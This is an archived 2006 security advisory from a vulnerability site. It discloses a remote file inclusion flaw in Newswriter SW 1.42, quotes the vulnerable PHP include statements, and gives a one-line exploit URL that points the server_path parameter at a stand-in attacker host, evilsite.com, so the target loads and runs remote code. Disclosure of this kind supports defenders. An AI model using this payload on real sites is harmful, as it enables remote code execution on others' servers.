Computer Security

Security Advisory: Newswriter SW <= 1.42 (NWCONF_SYSTEM[server_path]) Remote File Inclusion Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA22122] PhotoStore Cross-Site Scripting Vulnerabilities

  [SA22092] Opial Audio/Video Download Management Cross-Site Scripting

  [SA22117] eyeOS Cross-Site Scripting Vulnerabilities

  Kietu? <= v4.0.0b2z (url_hit) Remote File Inclusion Exploit

From:co-type_(at)_hotmail.com <co-type_(at)_hotmail.com>
Date:28.09.2006
Subject:Newswriter SW <= 1.42 (NWCONF_SYSTEM[server_path]) Remote File Inclusion Vulnerability

#================================================================================
==============
#Newswriter SW <= 1.42 (NWCONF_SYSTEM[server_path]) Remote File Inclusion Vulnerability
#================================================================================
===============
#
#Critical Level : Dangerous
#
#Script Dowload : http://www.baumedia.net/typo3conf/ext/nf_downloads/pi1/passdownload.php?downloadd
ata=3
#
#Version : 1.42
#
#================================================================================
================
#
#Bug in :
#
#include/editfunc.inc.php
#================================================================================
================
#
#Vulnerable Code :
#
#
#         include($NWCONF_SYSTEM['server_path'].
'include/javascript.inc'.$NWCONF_SYSTEM['php_ext']);
#         require($NWCONF_SYSTEM['server_path'].'include/text-out.
inc'.$NWCONF_SYSTEM['php_ext']);
#         require($NWCONF_SYSTEM['server_path'].'include/images.
inc'.$NWCONF_SYSTEM['php_ext']);
#         require($NWCONF_SYSTEM['server_path'].'include/filefunc.
inc'.$NWCONF_SYSTEM['php_ext']);
#
#================================================================================
================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Newswriter_SW_DIR]/include/editfunc.inc.
php?NWCONF_SYSTEM[server_path]=http://evilsite.com/evilscript.txt?
#
#
#================================================================================
================
#Discoverd By : Silahsiz Kuvvetler
#
#
#Conatact : co-type[at]hotmail[dot]com
#
#GreetZ : FaTTaLGazI- Narcotic - 0xyGen
#
#Special Thanqs : www.fatalerror.us
#================================================================================
==================

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server